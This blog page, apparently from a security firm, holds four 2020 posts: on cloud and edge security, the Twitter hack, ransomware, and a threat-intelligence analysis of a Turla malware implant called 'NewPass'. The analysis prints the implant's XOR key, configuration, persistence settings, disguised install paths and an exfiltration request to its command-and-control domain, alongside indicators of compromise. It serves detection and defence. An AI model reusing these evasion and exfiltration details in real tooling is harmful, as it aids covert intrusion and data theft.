English
Italiano
Products & Services
BLOG
LATEST BLOG POSTS
Cloud, Edge Computing and the future of cybersecurity
Cloud Computing is today a fully consolidated and still expanding reality, but the exponential development of IoT and 5G technology is increasingly attracting attention to Edge computing, a new distributed computing model designed to bring data processing to as close as possible to where the latter was produced. The debate on which is the best system to adopt, especially with regards to IT security, is still heated, given that both systems have advantages and disadvantages according to the different applications. The advantages and vulnerabilities of the Cloud Cloud computing undoubtedly has several advantages, since it is a flexible and inexpensive system that has also already been proven by years of use for the supply and use of numerous services via the internet. Services ranging from those of online cloud storage such as Dropbox, to streaming video on platforms such as Netflix. The essential feature that all these services have in common is centralization, in fact every time a request is sent, it is sent to the cloud provider, which processes it and then sends the desired content to the user. The main problem of the cloud, especially with regard to businesses, is related to the fact that corporate services and data are in fact entrusted to third parties, being exposed to a higher level of risk, both in terms of security and privacy. According to the Cloud Security Alliance association, the top three threats to cloud systems are unsafe API interfaces, data loss or theft and hardware failure, which account for 29%, 25% and 10% of all cloud security issues, respectively. Furthermore, the widespread use of virtualization in the implementation of the cloud infrastructure creates other security problems, because virtualization alters the relationship between the operating system and the underlying hardware, introducing an additional level that must be managed and protected correctly. Despite its limitations, Cloud Computing will continue to be used in the coming years, but many experts are confident that the implementation of some new technologies, including 5G above all, will lead to a gradual transition to new computational models. The 5G revolution The telecommunications sector is experiencing a moment of rapid transformation, thanks to the convergence of a series of technological innovations, including that of 5G, which will certainly play a central role because numerous other technologies depend on it. Without going into technical details, what is known for sure is that 5G technology will not only increase the speed of transmission and reception of data, but will also allow the simultaneous connection of a large number of devices, also providing a higher spectral system efficiency , which will allow one to increase the data volume per unit of area. All these characteristics are absolutely fundamental for the definitive diffusion of the Internet of Things (IoT) and of all the technologies that underlie the development of the “Smart city” and industry 4.0. Several 5G applications go perfectly with some Cloud Computing properties, such as support for ubiquitous connectivity and elasticity, but the development and diffusion of IoT technologies are introducing new requirements, including geographic distribution, low latency and support of mobility, which current Cloud systems cannot fully satisfy. Edge Computing innovation The solution to these problems could be the new model that has been developed in recent years: Edge Computing. As the name suggests, it is a radically different system compared to the cloud, because it is based precisely on the decentralization of data processing procedures, carried out precisely on the “margins” of the network. This fact has significant advantages in terms of processing latency, reduction of data traffic and greater resilience in case of connection interruption. These qualities therefore make Edge Computing particularly suitable for the implementation of IoT devices interconnected through the 5G infrastructure. From the cybersecurity point of view, the Edge has several advantages, which mainly depend precisely on the fact that the data is processed locally, eliminating the risks deriving from the series of data transfers, very often encrypted, which are inevitable when using regular cloud solutions. With Edge computing, calculations take place at the IoT device or perimeter server level and the only transfer is that of the final result to the user. However, this new model creates new types of problems, which should not be underestimated. The main risk is due to the lack of a global reference perimeter. In fact, since the edge data centers do not depend on a centralized system, all the relevant assets of the network infrastructure are controlled by different actors who must cooperate with each other and consequently each element of the infrastructure can be subject to attack at any time. Conclusions The Edge model is not yet widespread and although many analysts believe that in the long term it will almost completely replace the cloud infrastructure, it will first be necessary to develop security protocols that allow one to mitigate the new types of threats to which data could be exposed.
30. Jul 2020
Twitter attack: the three lessons to learn
The recent cyber-attack that hit Twitter has created a lot of media sensation, especially because it is the first time that one of the great global social media platforms has been compromised in such a vast and blatant way. Beyond the economic and image damage produced by the attack, this event must push us to make some broader considerations, starting from the implications for cybersecurity and privacy, up to the role that certain social networks have now assumed in the sphere of social and political life. The dynamics of the attack On July 15, 2020, between 8:00 PM and 10:00 PM UTC, several Twitter accounts of celebrities, each with millions of followers, were compromised by a cyber-attack aimed at soliciting a monetary scam. Essentially, the attackers asked users, through the official profiles of these celebrities, to send bitcoins to a specific wallet, with the promise that the money sent would then be returned and doubled. The scam was carried out using high-profile accounts to reach millions of people simultaneously. The first tweet of this type was sent from Elon Musk‘s Twitter account and then from those of other relevant people such as Barack Obama, Joe Biden, Bill Gates, Jeff Bezos, Michael Bloomberg, Warren Buffett, Floyd Mayweather, Kim Kardashian and companies like Apple and Uber. Twitter believes that 130 accounts were compromised and that only 45 of them were later used to tweet. More than 12 bitcoins, the equivalent of over $ 110,000, have been sent to one of the addresses involved. The social network intervened after a few hours, blocking the compromised accounts and deleting all the fraudulent tweets. Twitter later confirmed the incident, calling it “a coordinated social engineering attack by people who targeted some of our employees with access to internal systems and tools.” Which explains how the attackers managed to use the platform’s administrative systems to edit accounts and publish tweets directly. The importance of the human factor The first of the three lessons that can be learned from this story concerns what has always been considered the Achilles’ heel of every computer security system: the human factor. In fact, it is obvious that even the most advanced cybersecurity structure in the world becomes useless if the real people who must guarantee its integrity make a mistake or, even worse, decide to violate it in accordance with external entities. Although all of this was already widely known, the Twitter case brought back the discussion on how to prevent this type of accident. The main problem is that these are highly unpredictable events, precisely because they are caused by people’s free actions and not by the malfunction of some software. Mainly for this reason, many experts suggest relying increasingly on certain new technologies, such as artificial intelligence and machine learning systems, not only to prevent external threats, but also to monitor the behavior of internal employees. Others, however, propose more stringent limitations and controls for access to administrative systems, but barring new revolutionary innovations, it is likely that the human factor will continue to be a serious problem also in the near future. The vulnerability of our personal data The second aspect that must be considered is that relating to privacy and the risk of exposure of one’s personal data. In fact, many have become accustomed to assuming social networks are totally safe environments for communicating and sharing photos and information, so as to lose any prudence in their use. But if someone has managed to access the personal profiles of people like Bill Gates and Elon Musk, it is clear that nobody can consider himself truly safe. For this reason, it is essential to invest in the development and diffusion of a culture of information security, which above all underlines the great risks that can be run in transmitting private information via social networks. Greater awareness of these issues would significantly contribute to limiting the number of accidents, also because reducing the vulnerability to certain types of attacks that exploit social engineering, such as phishing, would precisely mitigate the incidence of the human factor. The problem of the link between politics and social media The third, and perhaps more serious, element on which it is necessary to reflect concerns the ever-closer link between politics and social platforms. If for years there has been talk of “fake news” and the political influence of anonymous groups of hacker-activists, this attack puts democratic society before new disturbing scenarios. Several analysts, including those from the Washington Post, immediately stressed the potentially catastrophic consequences of a possible attack of this type during the election campaign period or at the time of the elections. The chaos generated by the dissemination of false information and the consequent blocking of accounts could influence the outcome of a vote in certain ways, threatening the functioning of democratic society in the digital age. Conclusions These are just some of the main aspects that this story has brought to the spotlight, but it is clear that an attack of this magnitude will continue to produce debates and confrontations, which is good, because only a general awareness of the risks and threats within cyberspace will help prevent even more disastrous events in the future.
23. Jul 2020
Turla / Venomous Bear updates its arsenal: “NewPass” appears on the APT threat scene
Recently Telsy observed some artifacts related to an attack that occurred in June 2020 that is most likely linked to the popular Russian Advanced Persistent Threat (APT) known as Venomous Bear (aka Turla or Uroburos). At the best of our knowledge, this time the hacking group used a previously unseen implant, that we internally named “NewPass“ as one of the parameters used to send exfiltrated data to the command and control. Telsy suspects this implant has been used to target at least one European Union country in the sector of diplomacy and foreign affairs. NewPass is quite a complex malware composed by different components that rely on an encoded file to pass information and configuration between each other. There are at least three components of the malware: a dropper, that deploys the binary file; a loader library, that is able to decode the binary file extracting the last component, responsible for performing specific operations, such as communicate with the attackers’ command and control server (the “agent”) The loader and the agent share a JSON configuration resident in memory that demonstrate the potential of the malware and the ease with which the attackers can customize the implant by simply changing the configuration entries’ values. Dropper Analysis The first Windows library has a huge size, about 2.6 MB, and it is identified by the following hash: TypeValueSHA256e1741e02d9387542cc809f747c78d5a352e7682a9b83cbe210c09e2241af6078 Exploring the artifact using a static approach, it is possible to note that it exports a high number of functions, as shown in the following image. Most of the reported functions point to useless code and only LocalDataVer can be used as an entry point of the DLL, therefore making it useful to understand the malicious behavior. Attackers used this trick likely to avoid sandbox analysis, as well as make manual analysis slightly harder. Sandbox solutions, in fact, probably will try to execute a DLL file using rundll32.exe or regsvr32.exe utilities, using “DllMain” or “DllRegisterServer” as an entrypoint function. In this case, both these functions cause the termination of the program, without showing the real malware behavior. The library’s aim is to deploy the backdoor and its configuration file under two different folders depending on attacker’s customization. According to what has been observed by our research team, the paths used in this case are the following: Configuration PathBackdoor PathProgramData\Adobe\ARM\Reader_20.021.210_47.datC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\lib3DXquery.dllProgramData\WindowsHolographic\SpatialStore\HolographicSpatialStore.swidWindowsHolographicService.dll For the second sample we weren’t able to retrieve its dropper. Therefore, it is possible to obtain the location of the configuration file from which the backdoor tried to load the parameters, but not the exact location in which the dropper deployed the implant artifact. Furthermore, the used paths are very stealthy and it is easy to confuse the artifacts as components of legitimate programs, such as Adobe Reader or Windows Mixed Reality. In particular, the path of the first sample is the same used by the legitimate Adobe Reader installation and therefore the lib3DXquery.dll file matches up perfectly with the other Adobe components, making it almost totally invisible. The configuration file written, at first glance, seems to be totally encrypted and incomprehensible without analyzing the next stage. The following image shows the configuration file in its raw form. Loader Analysis The retrieved backdoor implants are identified by the following hashes: NameSHA256lib3DXquery.dll6e730ea7b38ea80f2e852781f0a96e0bb16ebed8793a5ea4902e94c594bb6ae0WindowsHolographicService.dllf966ef66d0510da597fec917451c891480a785097b167c6a7ea130cf1e8ff514 Once again, the libraries export several functions but only one is useful to execute their real payload. To begin, the library checks the presence of the associated configuration file, if it does not exist, the backdoor terminates its execution. Vice versa, once found the file the malware starts to decode and read the current configuration. The first 5 bytes of the file contains the size of the data to read starting from the 6th bytes and which contains the first encoded information useful to allow the malware to load the entire configuration. All the data retrieved in this first phase is encoded using a simple XOR algorithm with a fixed key 19 B9 20 5A B8 EF 2D A3 73 08 C1 53, hardcoded at the beginning of the function as represented in the following image. So, the malware reads the first 5 bytes and decodes it using the key, obtaining the number of the bytes it has to read to obtain the initial configuration. In this specific case, from the decoded bytes it gets the value 00081. So, it proceeds to read other next 81 bytes. Decoding these last ones with the usual key, it obtains a string composed by different parameters separated by “||”, as illustrated below. However, this is still not the final configuration used by the malware, but it contains only the parameters to load the last malicious Windows library, named LastJournalx32.adf, containing the final agent. This payload is hidden into the configuration file after a section of random bytes used by the attackers to change the hash value of the file at every infection. During its activity, the loader decrypts and maintains in memory the complete configuration used during the infection chain. It consists of different JSON formatted structures that look like the following: { “RefreshToken”:””, “NoInternetSleepTime”:”3600″, “GetMaxSize”:”60000″, “ClientId”:””, “DropperExportFunctionName”:”LocalDataVer”, “Autorun”:”16″, “ImgurImageDeletionTime”:”120″, “RecoveryServers”:[ ], “RunDllPath”:”%WinDir%\\System32″, “AgentLoaderExportFunctionName”:”LocalDataVer”, “Key”:”[…redacted…]”, “AgentName”:”LastJournalx32.adf”, “UserAgent”:””, […truncated…] The structure contains all the information necessary for the loader to correctly launch the final agent. Some of these information are AgentFileSystemName, AgentExportName and AgentName. The agent shares the same memory space of the loader, thus it is able to access to the same configuration and to extract the needed parameters, such as the object named Credentials. It also contains the domain name (newshealthsport[.]com) and the path (/sport/latest.php) of the command-and-control with which the agent will communicate. From the configuration it is also possible to notice the version number of the malware, specifically it is 19.03.28 for the AgentLoader and 19.7.16 for the Agent. Moreover, the agent is identified by an ID addressed by the AgentID entry that is used during the communication with the C2 as identifier of the infected machine. The configuration also embeds a specific structure for persistence mechanisms that appears as follow: { “Autoruns”: { “Service”: { “DisplayName”: “Adobe Update Module”, “ServiceName”: “Adobe Update Module”, “Enabled”: “true” }, “TaskScheduler”: { “Enabled”: “false” }, “Registry”: { “Enabled”: “false” }, “Policies”: { “Enabled”: “false” } } } The implant supports different types of persistence mechanisms: through Service Manager, Task Scheduler, via Registry Key or using Windows GPO. In this specific case, attackers enabled the Service method that allows the malware to interact with the SCManager to create a new service named Adobe Update Module pointing to the path of the loader. Agent Analysis The last payload is identified by the following hash: TypeValueSHA25608a1c5b9b558fb8e8201b5d3b998d888dd6df37dbf450ce0284d510a7104ad7f It is responsible for exfiltrating information from the infected machine, sending it to the command-and-control and downloading new commands to be executed. To make the communication with the C2 stealthier, the agent uses a set of keywords to separate the data within a POST request. The keywords are specified by attackers during development phase. In the analyzed case, they are the following: dbnewcontentnamenewpasspassdbdata_srcserver_logintable_datatoken_nameserver_pagetargetlogin So, during the exfiltration phase, the HTTP requests appear as reported in the table below POST /sport/latest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: newshealthsport. com Content-Length: 170 Connection: Keep-Alive newpass=[redacted]&server_page=[redacted]&passdb=[redacted]&targetlogin=t&table_data=[redacted] All the values embedded into the request are encrypted, probably using one of the keys embedded into the previous configuration. The algorithm used during the encryption phase is most probably a custom one. Below, we report a simple scheme of the described infection chain, highlighting the three components of this new threat: the dropper, the loader and the agent. Persistence As mentioned above, the malware is able to create services or tasks or to add registry keys to achieve persistence. In the analyzed case, the loader component is set to create a new Windows service, specifying its path location as ImagePath. ATT&CK Matrix TechniqueTacticDescriptionT1204ExecutionThreat actor relies upon specific actions by a user in order to gain executionT1060PersistenceThreat actor adds an entry to the “run keys” in the Registry or startup folder to allow the program will be executed when a user logs inT1053PersistenceThreat actor uses Windows Task Scheduler to schedule programs or scripts to be executed at a date and timeT1543PersistenceAdversaries create or modify Windows services to repeatedly execute malicious payloads as part of persistenceT1073Defense EvasionPrograms specifies DLLs that are loaded at runtimeT1132Command and controlCommand and control (C2) information is encoded using a standard data encoding systemT1001Command and ControlCommand and control (C2) communications are hidden in an attempt to make the content more difficult to discover or decipherT1041ExfiltrationThreat actor relies on command and control infrastructure to exfiltrate data Indicators of Compromise TypeValueSHA256e1741e02d9387542cc809f747c78d5a352e7682a9b83cbe210c09e2241af6078SHA2566e730ea7b38ea80f2e852781f0a96e0bb16ebed8793a5ea4902e94c594bb6ae0SHA25608a1c5b9b558fb8e8201b5d3b998d888dd6df37dbf450ce0284d510a7104ad7fSHA256f966ef66d0510da597fec917451c891480a785097b167c6a7ea130cf1e8ff514Domainnewshealthsport. comURLhttp://newshealthsport. com/sport/latest.php
14. Jul 2020
Ransomware: a threat to the present and the future
Ransomware has become an increasingly prominent threat to cyberspace security globally and the recent statistical data collected would seem to confirm this trend also for the years to come. What is ransomware and how it works The term “ransomware” refers to a type of malware that limits access to the device it infects, requiring a ransom to be paid to remove the limitation. Some forms of ransomware, for example, block the system and order the user to pay to unlock it, whereas others encrypt the user’s files instead, asking the user to pay a sum to make the files readable again. There are of course many variations of ransomware, but the basic mechanisms are almost always the same. The driving force behind ransomware attacks is, in fact, almost always monetary and, unlike other types of cyber-attacks, the victim is usually notified that an intrusion has occurred and instructions are provided on how to obtain the recovery of infected systems. Payment is very often requested in a virtual currency, such as bitcoin, so that the identity of the cybercriminal is not as easily identifiable. As for the transmission of the infection, there is a wide range of channels that can be exploited to spread this type of malware. Phishing is certainly the most widespread, but carriers that exploit browsing on compromised sites and browser vulnerabilities are also suitable for transmission to convey malware through “drive by download” or the use of bridgeheads such as advanced Emotet framework. The malware then performs a payload, which can encrypt the files on the hard disk (normally through an asymmetric encryption system, with a public and a private key), or simply limit interaction with the system, acting on the Windows shell and making it inoperative and controlled by the malware itself, or even modifying the master boot record and / or the partition table preventing the operating system from starting. The spread of ransomware The first ransomware in history was the AIDS trojan, also known as “PC Cyborg”, written in 1989 by biologist Joseph Popp. Since then, ransomware has spread more and more, with some cases rising to the headlines for their effectiveness and for the economic damage caused. Among the best known there is certainly “CryptoLocker“, a ransomware released in 2013, which was extremely difficult to eliminate and estimated to have extorted at least 3 million dollars before its removal. The 2017 WannaCry attack is considered to be the largest ransomware attack ever, with over 230,000 computers infected in 150 different countries. These are remarkable numbers, which explains why this type of attack is spreading more and more. In fact, the Clusit 2020 report showed that in the last year there has been an increase of + 23% in cases of ransomware, with a percentage frequency equal to almost half (46%) of all types of malware analyzed. Furthermore, according to the latest reports, Italy in 2019 is the second most affected country in Europe, after Germany, with 12.68% of cases across the continent. The future scenario and possible countermeasures The spread of IoT devices, cloud services and the increase in digitalization caused by the Covid emergency further increased the dangerous potential of these malwares, leading them not only to undermine the safety of commonly used devices, but also to compromise services and entire corporate networks, as in the recent case of the Italian company Geox, whose communication systems have been blocked for some time by a ransomware. So if you are sure that ransomware will continue to be one of the main cyber threats of the future, you need to start preparing effective security systems and protocols. In particular, considering that these attacks are more likely to succeed if they manage to pass the first reconnaissance phase, it is absolutely necessary to develop and use systems that are able to promptly detect the indicators of an ongoing attack, allowing one to intervene before the given malware can compromise your systems. The simplest and most effective defense strategy remains, however, to keep a safe copy of the files, adequately guarding the files through regular backups made preferably with offline or cloud solutions. As always in the world of cybersecurity, it is almost impossible to guarantee absolute protection, but it is clearly possible to develop a system that can greatly mitigate exposure to risk.
10. Jul 2020